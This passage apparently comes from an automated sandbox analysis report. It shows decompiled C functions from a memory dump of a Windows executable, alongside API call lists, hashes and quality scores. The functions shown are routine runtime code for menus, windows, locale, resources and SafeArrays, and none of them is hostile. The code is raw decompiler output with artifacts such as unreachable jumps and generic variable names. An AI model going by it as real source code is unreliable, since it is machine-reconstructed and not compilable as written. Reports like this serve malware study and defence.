    • GetWindow.USER32(00000000,00000004), ref: 004298EE
    • GetCurrentThreadId.KERNEL32 ref: 004299C2
    • GetWindowRect.USER32(00000000,?), ref: 004299DF
    • IntersectRect.USER32(?,?,?), ref: 00429A4D
      • Part of subcall function 00428E38: GetWindowThreadProcessId.USER32(?), ref: 00428E45
      • Part of subcall function 00428E38: GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,00429908,?,-0000000C,?), ref: 00428E4E
      • Part of subcall function 00428E38: GlobalFindAtomA.KERNEL32(00000000), ref: 00428E63
      • Part of subcall function 00428E38: GetPropA.USER32(?,00000000), ref: 00428E7A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
    • String ID:
    • API String ID: 2049660638-0
    • Opcode ID: 408ef24fb3915b696d4c857943abfe534249f1f0a128b7e5cd293e15de008396
    • Instruction ID: bbdd6da2919a956a64e9bc75f4e392a7f55fee3a30584de8f181e23d5aeb018a
    • Opcode Fuzzy Hash: 408ef24fb3915b696d4c857943abfe534249f1f0a128b7e5cd293e15de008396
    • Instruction Fuzzy Hash: 86517F71B002189FCB10DF69D481BAEB7F4AF08354F54816AE845EB391D738EE41CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040EC7C(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040EB48(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040DD58();
    							E0040EB48(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040DD60();
    							E0040EB48(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040EC20(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040EBF0(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040DD68();
    						E0040EB48(_v780);
    						E0040EE74(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040D8F4();
    				return E0040EB48(_v776);
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040ED2B
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040ED47
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EDBE
    • VariantClear.OLEAUT32(?), ref: 0040EDE7
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File
    Similarity
    • API ID: ArraySafe$Bound$ClearIndexVariant
    • String ID:
    • API String ID: 920484758-0
    • Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
    • Instruction ID: 21ced035a400a35a4c92a9fc9132514a7d541c61c58b6200b60ec4ca9853bd29
    • Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
    • Instruction Fuzzy Hash: C3411F759002199FCB62DB5ACC90AC9B3BCEF48304F0045EAE649B7352DA34AF948F58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C510() {
    				char* _v28;
    				char _v156;
    				short _v414;
    				signed short _t16;
    				signed int _t18;
    				int _t20;
    				void* _t22;
    				void* _t25;
    				int _t26;
    				int _t30;
    				signed int _t34;
    				signed int _t35;
    				signed int _t36;
    				signed int _t41;
    				int* _t43;
    				short* _t44;
    				void* _t52;
    
    				 *0x47b738 = 0x409;
    				 *0x47b73c = 9;
    				 *0x47b740 = 1;
    				_t16 = GetThreadLocale();
    				if(_t16 != 0) {
    					 *0x47b738 = _t16;
    				}
    				if(_t16 != 0) {
    					 *0x47b73c = _t16 & 0x3ff;
    					 *0x47b740 = (_t16 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x479110, 0x40c668, 8 << 2);
    				if( *0x4790c8 != 2) {
    					_t18 = GetSystemMetrics(0x4a);
    					__eflags = _t18;
    					 *0x47b745 = _t18 & 0xffffff00 | _t18 != 0x00000000;
    					_t20 = GetSystemMetrics(0x2a);
    					__eflags = _t20;
    					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
    					 *0x47b744 = _t35;
    					__eflags = _t35;
    					if(__eflags != 0) {
    						return E0040C498(__eflags, _t52);
    					}
    				} else {
    					_t22 = E0040C4F8();
    					if(_t22 != 0) {
    						 *0x47b745 = 0;
    						 *0x47b744 = 0;
    						return _t22;
    					}
    					E0040C498(__eflags, _t52);
    					_t41 = 0x20;
    					_t25 = E00402FA8(0x479110, 0x20, 0x40c668);
    					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x47b744 = _t36;
    					__eflags = _t36;
    					if(_t36 != 0) {
    						 *0x47b745 = 0;
    						return _t25;
    					}
    					_t26 = 0x80;
    					_t43 =  &_v156;
    					do {
    						 *_t43 = _t26;
    						_t26 = _t26 + 1;
    						_t43 =  &(_t43[0]);
    						__eflags = _t26 - 0x100;
    					} while (_t26 != 0x100);
    					_v28 =  &_v156;
    					_t30 =  *0x47b738; // 0x409
    					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
    					_t20 = 0x80;
    					_t44 =  &_v414;
    					while(1) {
    						__eflags =  *_t44 - 2;
    						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
    						 *0x47b745 = _t41;
    						__eflags = _t41;
    						if(_t41 != 0) {
    							goto L17;
    						}
    						_t44 = _t44 + 2;
    						_t20 = _t20 - 1;
    						__eflags = _t20;
    						if(_t20 != 0) {
    							continue;
    						} else {
    							return _t20;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t20;
    				goto L18;
    			}

    APIs
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040C60A
    • GetThreadLocale.KERNEL32 ref: 0040C53A
      • Part of subcall function 0040C498: GetCPInfo.KERNEL32(00000000,?), ref: 0040C4B1
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: InfoLocaleStringThreadType
    • String ID:
    • API String ID: 1505017576-0
    • Opcode ID: 22f6e89dbcfc3dc8776c89fd5e43eb4b745ab72a5bba2d12a6cd6b8fbb2797da
    • Instruction ID: 90b006cfb23b63b7da1e610c4884db5ce379cd136e4bf50f6a6a468e9ef9f15f
    • Opcode Fuzzy Hash: 22f6e89dbcfc3dc8776c89fd5e43eb4b745ab72a5bba2d12a6cd6b8fbb2797da
    • Instruction Fuzzy Hash: F5315721500354DED7209735AC827AA3794EB82305F84417BE84CAB3C2DB3D4885C7EE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0043F5A4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
    				intOrPtr _v8;
    				void* __ecx;
    				void* __edi;
    				int _t27;
    				void* _t40;
    				int _t41;
    				int _t50;
    
    				_t50 = _t41;
    				_t49 = __edx;
    				_t40 = __eax;
    				if(E0043EC80(__eax) == 0) {
    					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
    				}
    				_v8 = 0;
    				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
    					_t27 = GetMenuItemID(_t49, _t50);
    					_t51 = _t27;
    					if(_t27 != 0xffffffff) {
    						_v8 = E0043EAFC(_t40, 0, _t51);
    					}
    				} else {
    					_t49 = GetSubMenu(_t49, _t50);
    					_v8 = E0043EAFC(_t40, 1, _t37);
    				}
    				if(_v8 == 0) {
    					return 0;
    				} else {
    					 *_a12 = 0;
    					E00408704(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
    					return E00408640(_a12, _t49);
    				}
    			}

    APIs
    • GetMenuState.USER32(?,?,?), ref: 0043F5C7
    • GetSubMenu.USER32(?,?), ref: 0043F5D2
    • GetMenuItemID.USER32(?,?), ref: 0043F5EB
    • GetMenuStringA.USER32(?,?,?,?,?), ref: 0043F63E
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Menu$ItemStateString
    • String ID:
    • API String ID: 306270399-0
    • Opcode ID: b15a0b98d861f5cd5f58b237bcbcd170f15f212fee3379aef1c169b5d66f75ad
    • Instruction ID: b813469a94bc0a242b0835a6068308d9acfb0f37e51f5ff621fc8c3c287841f4
    • Opcode Fuzzy Hash: b15a0b98d861f5cd5f58b237bcbcd170f15f212fee3379aef1c169b5d66f75ad
    • Instruction Fuzzy Hash: D711AF31A05114AFC700EF6E8C82AAF77E8AF4D368F20543BF805D7391D6789D069768
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00448608(void* __eax) {
    				void* _t16;
    				void* _t37;
    				void* _t38;
    				signed int _t41;
    
    				_t16 = __eax;
    				_t38 = __eax;
    				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x479ba4 != 0) {
    					_t16 = E0043286C(__eax);
    					if(_t16 != 0) {
    						_t41 = GetWindowLongA(E0043260C(_t38), 0xffffffec);
    						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
    							if((_t41 & 0x00080000) == 0) {
    								SetWindowLongA(E0043260C(_t38), 0xffffffec, _t41 | 0x00080000);
    							}
    							return  *0x479ba4(E0043260C(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00479C28 |  *0x00479C30);
    						} else {
    							SetWindowLongA(E0043260C(_t38), 0xffffffec, _t41 & 0xfff7ffff);
    							_push(0x485);
    							_push(0);
    							_push(0);
    							_t37 = E0043260C(_t38);
    							_push(_t37);
    							L0040698C();
    							return _t37;
    						}
    					}
    				}
    				return _t16;
    			}







    APIs
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0044863C
    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0044866E
    • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004461F4), ref: 004486A8
    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004486C1
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$Long$AttributesLayered
    • String ID:
    • API String ID: 2169480361-0
    • Opcode ID: eb12b681c861b6fa3a3468ffafc3e4f303ffc185e3ad86889964486942611ac9
    • Instruction ID: fd451d871bfa946b5a99569279126de3649089d83a1f5304be9f8fabb38908c5
    • Opcode Fuzzy Hash: eb12b681c861b6fa3a3468ffafc3e4f303ffc185e3ad86889964486942611ac9
    • Instruction Fuzzy Hash: A111ABB06082D419DB50BB794D89B4B3B981F09314F05557E7949EB2D7C97CC844876C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041A954(intOrPtr _a4, short _a6, intOrPtr _a8) {
    				struct _WNDCLASSA _v44;
    				struct HINSTANCE__* _t6;
    				CHAR* _t8;
    				struct HINSTANCE__* _t9;
    				int _t10;
    				void* _t11;
    				struct HINSTANCE__* _t13;
    				struct HINSTANCE__* _t19;
    				CHAR* _t20;
    				struct HWND__* _t22;
    				CHAR* _t24;
    
    				_t6 =  *0x47b660; // 0x400000
    				 *0x479400 = _t6;
    				_t8 =  *0x479414; // 0x41a944
    				_t9 =  *0x47b660; // 0x400000
    				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
    				asm("sbb eax, eax");
    				_t11 = _t10 + 1;
    				if(_t11 == 0 || L0040668C != _v44.lpfnWndProc) {
    					if(_t11 != 0) {
    						_t19 =  *0x47b660; // 0x400000
    						_t20 =  *0x479414; // 0x41a944
    						UnregisterClassA(_t20, _t19);
    					}
    					RegisterClassA(0x4793f0);
    				}
    				_t13 =  *0x47b660; // 0x400000
    				_t24 =  *0x479414; // 0x41a944
    				_t22 = E00406B8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
    				if(_a6 != 0) {
    					SetWindowLongA(_t22, 0xfffffffc, E0041A898(_a4, _a8));
    				}
    				return _t22;
    			}














    APIs
    • GetClassInfoA.USER32(00400000,0041A944,?), ref: 0041A975
    • UnregisterClassA.USER32(0041A944,00400000), ref: 0041A99E
    • RegisterClassA.USER32(004793F0), ref: 0041A9A8
    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041A9F3
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Class$InfoLongRegisterUnregisterWindow
    • String ID:
    • API String ID: 4025006896-0
    • Opcode ID: 79b50d5c5a438a967481b2006713c30b0d12274214d7c3a86695096d7b6c5ce5
    • Instruction ID: ae3135c9e79ccd4dcef4f7c11ca33282a84e7a751fcc53b044c6d2bc61941cc8
    • Opcode Fuzzy Hash: 79b50d5c5a438a967481b2006713c30b0d12274214d7c3a86695096d7b6c5ce5
    • Instruction Fuzzy Hash: 3B0152B12541086BCB10EF58DC81F9A33A9E708318F118536F909E72E1D7399CE5C7AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0044A2F4(void* __eax, void* __ecx, char __edx) {
    				char _v12;
    				struct HWND__* _v20;
    				int _t17;
    				void* _t27;
    				struct HWND__* _t33;
    				void* _t35;
    				void* _t36;
    				long _t37;
    
    				_t37 = _t36 + 0xfffffff8;
    				_t27 = __eax;
    				_t17 =  *0x47bb9c; // 0x2321704
    				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
    					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
    						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
    						_v12 = __edx;
    						EnumWindows(E0044A284, _t37);
    						_t17 =  *(_t27 + 0x90);
    						if( *((intOrPtr*)(_t17 + 8)) != 0) {
    							_t33 = GetWindow(_v20, 3);
    							_v20 = _t33;
    							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
    								_v20 = 0xfffffffe;
    							}
    							_t17 =  *(_t27 + 0x90);
    							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
    							if(_t35 >= 0) {
    								do {
    									_t17 = SetWindowPos(E00413E68( *(_t27 + 0x90), _t35), _v20, 0, 0, 0, 0, 0x213);
    									_t35 = _t35 - 1;
    								} while (_t35 != 0xffffffff);
    							}
    						}
    					}
    					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
    				}
    				return _t17;
    			}











    APIs
    • EnumWindows.USER32(Function_0004A284), ref: 0044A329
    • GetWindow.USER32(?,00000003), ref: 0044A341
    • GetWindowLongA.USER32(00000000,000000EC), ref: 0044A34E
    • SetWindowPos.USER32(00000000,000000EC,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,?,00000003,Function_0004A284), ref: 0044A38D
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$EnumLongWindows
    • String ID:
    • API String ID: 4191631535-0
    • Opcode ID: 48d6bf516528ee174cba6ebad1448ea62d4c4e36b2ef7bdcb4e8b29264931c63
    • Instruction ID: 2cd13647c8dd889e59654f65fa4ccde03fc349b64cd3b4df7b002fd8f15e812c
    • Opcode Fuzzy Hash: 48d6bf516528ee174cba6ebad1448ea62d4c4e36b2ef7bdcb4e8b29264931c63
    • Instruction Fuzzy Hash: 39119E316847009FEB11EE2CC885F9A7398AB45724F15027AFD98AB6D2C3789C50CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041E1A8(struct HDC__* __eax, signed int __ecx) {
    				char _v1036;
    				signed int _v1038;
    				struct tagRGBQUAD _v1048;
    				short _v1066;
    				short* _t15;
    				void* _t18;
    				struct HDC__* _t23;
    				void* _t26;
    				short* _t31;
    				short* _t32;
    
    				_t31 = 0;
    				 *_t32 = 0x300;
    				if(__eax == 0) {
    					_v1038 = __ecx;
    					E00402C48(_t26, __ecx << 2,  &_v1036);
    				} else {
    					_push(0);
    					L00406484();
    					_t23 = __eax;
    					_t18 = SelectObject(__eax, __eax);
    					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
    					SelectObject(_t23, _t18);
    					DeleteDC(_t23);
    				}
    				if(_v1038 != 0) {
    					if(_v1038 != 0x10 || E0041E110(_t32) == 0) {
    						E0041DFA0( &_v1036, _v1038 & 0x0000ffff);
    					}
    					_t15 = _t32;
    					_push(_t15);
    					L004064AC();
    					_t31 = _t15;
    				}
    				return _t31;
    			}













    APIs
    • SelectObject.GDI32(00000000,00000000), ref: 0041E1CA
    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,004206B3,?,?,?,?,0041F297), ref: 0041E1DE
    • SelectObject.GDI32(00000000,00000000), ref: 0041E1EA
    • DeleteDC.GDI32(00000000), ref: 0041E1F0
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: ObjectSelect$ColorDeleteTable
    • String ID:
    • API String ID: 3862836420-0
    • Opcode ID: ee732dd7c19ca15d241b6d8aa4919e4cb8b1ed1dea575a39d2d56be08379786a
    • Instruction ID: 5aa1a43ce8c665b3033a090e8f6bf31adb0acf8d95989d8af2e3b2827e97019d
    • Opcode Fuzzy Hash: ee732dd7c19ca15d241b6d8aa4919e4cb8b1ed1dea575a39d2d56be08379786a
    • Instruction Fuzzy Hash: 4301847560431076E614A7679D57AAB72EC8FC0718F01C92FF989972C2E67C8845839A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00416400(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
    				CHAR* _v8;
    				void* __ebx;
    				void* __ecx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t18;
    				void* _t23;
    				CHAR* _t24;
    				void* _t25;
    				struct HRSRC__* _t29;
    				void* _t30;
    				struct HINSTANCE__* _t31;
    				void* _t32;
    
    				_v8 = _t24;
    				_t31 = __edx;
    				_t23 = __eax;
    				_t29 = FindResourceA(__edx, _v8, _a4);
    				 *(_t23 + 0x10) = _t29;
    				_t33 = _t29;
    				if(_t29 == 0) {
    					E00416390(_t23, _t24, _t29, _t31, _t33, _t32);
    					_pop(_t24);
    				}
    				_t5 = _t23 + 0x10; // 0x4164a4
    				_t30 = LoadResource(_t31,  *_t5);
    				 *(_t23 + 0x14) = _t30;
    				_t34 = _t30;
    				if(_t30 == 0) {
    					E00416390(_t23, _t24, _t30, _t31, _t34, _t32);
    				}
    				_t7 = _t23 + 0x10; // 0x4164a4
    				_push(SizeofResource(_t31,  *_t7));
    				_t8 = _t23 + 0x14; // 0x416168
    				_t18 = LockResource( *_t8);
    				_pop(_t25);
    				return E00416128(_t23, _t25, _t18);
    			}

















    APIs
    • FindResourceA.KERNEL32(?,?,?), ref: 00416417
    • LoadResource.KERNEL32(?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 00416431
    • SizeofResource.KERNEL32(?,004164A4,?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 0041644B
    • LockResource.KERNEL32(00416168,00000000,?,004164A4,?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 00416455
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Resource$FindLoadLockSizeof
    • String ID:
    • API String ID: 3473537107-0
    • Opcode ID: 2d9deb7d5a64a12c4e3a689ae88f5fc9eee7e2964d995190cd733733bf81b0fb
    • Instruction ID: 825aa1ec1ff003f80e9d0c96cc909ef71b8a577fb1871f4dbbb4c43b087467ca
    • Opcode Fuzzy Hash: 2d9deb7d5a64a12c4e3a689ae88f5fc9eee7e2964d995190cd733733bf81b0fb
    • Instruction Fuzzy Hash: D2F06DB26002046F9744EEADA881D9B77DCDE88364322046FFD08D7246DA39ED5147BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00429CBC(struct HWND__* __eax, void* __ecx) {
    				intOrPtr _t9;
    				signed int _t16;
    				struct HWND__* _t19;
    				DWORD* _t20;
    
    				_t17 = __ecx;
    				_push(__ecx);
    				_t19 = __eax;
    				_t16 = 0;
    				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
    					_t9 =  *0x47bb0c; // 0x232126c
    					if(GlobalFindAtomA(E004046A0(_t9)) !=  *0x47bb08) {
    						_t16 = 0 | E00428E04(_t19, _t17) != 0x00000000;
    					} else {
    						_t16 = 0 | GetPropA(_t19,  *0x47bb08 & 0x0000ffff) != 0x00000000;
    					}
    				}
    				return _t16;
    			}







    APIs
    • GetWindowThreadProcessId.USER32(00000000), ref: 00429CC9
    • GetCurrentProcessId.KERNEL32(?,-0000000C,00000000,00429D34,00429AF6,0047BB40,00000000,004298E6,?,-0000000C,?), ref: 00429CD2
    • GlobalFindAtomA.KERNEL32(00000000), ref: 00429CE7
    • GetPropA.USER32(00000000,00000000), ref: 00429CFE
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
    • String ID:
    • API String ID: 2582817389-0
    • Opcode ID: be624f69449041e11262bd9f58456c00d29f21a9a6ce0bf69cdc41924047b232
    • Instruction ID: dc55b1bc5ea62401a37517273a61435616e8523c1b197546111c438156e2348a
    • Opcode Fuzzy Hash: be624f69449041e11262bd9f58456c00d29f21a9a6ce0bf69cdc41924047b232
    • Instruction Fuzzy Hash: 09F0A066312531579B21BB677D8197F128CCE02368BD1843BFC00E3196EB2CDC91E2AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00428E38(struct HWND__* __eax, void* __ecx) {
    				intOrPtr _t5;
    				struct HWND__* _t12;
    				void* _t15;
    				DWORD* _t16;
    
    				_t13 = __ecx;
    				_push(__ecx);
    				_t12 = __eax;
    				_t15 = 0;
    				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
    					_t5 =  *0x47bb10; // 0x2321288
    					if(GlobalFindAtomA(E004046A0(_t5)) !=  *0x47bb0a) {
    						_t15 = E00428E04(_t12, _t13);
    					} else {
    						_t15 = GetPropA(_t12,  *0x47bb0a & 0x0000ffff);
    					}
    				}
    				return _t15;
    			}







    APIs
    • GetWindowThreadProcessId.USER32(?), ref: 00428E45
    • GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,00429908,?,-0000000C,?), ref: 00428E4E
    • GlobalFindAtomA.KERNEL32(00000000), ref: 00428E63
    • GetPropA.USER32(?,00000000), ref: 00428E7A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
    • String ID:
    • API String ID: 2582817389-0
    • Opcode ID: 071d3087b0a16e43fb508f3ed079163a4f3f1fdf2d9abbbe47a10eaa9a3a288e
    • Instruction ID: fa68e92e0b77d8bf8320e03fda03b315f72a48c1daf686a2cceec40ce78937ed
    • Opcode Fuzzy Hash: 071d3087b0a16e43fb508f3ed079163a4f3f1fdf2d9abbbe47a10eaa9a3a288e
    • Instruction Fuzzy Hash: F5F0125270313456E960B7A66C8192F218C8F0575438A493FFD05E7256DA3D9C50C2FD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
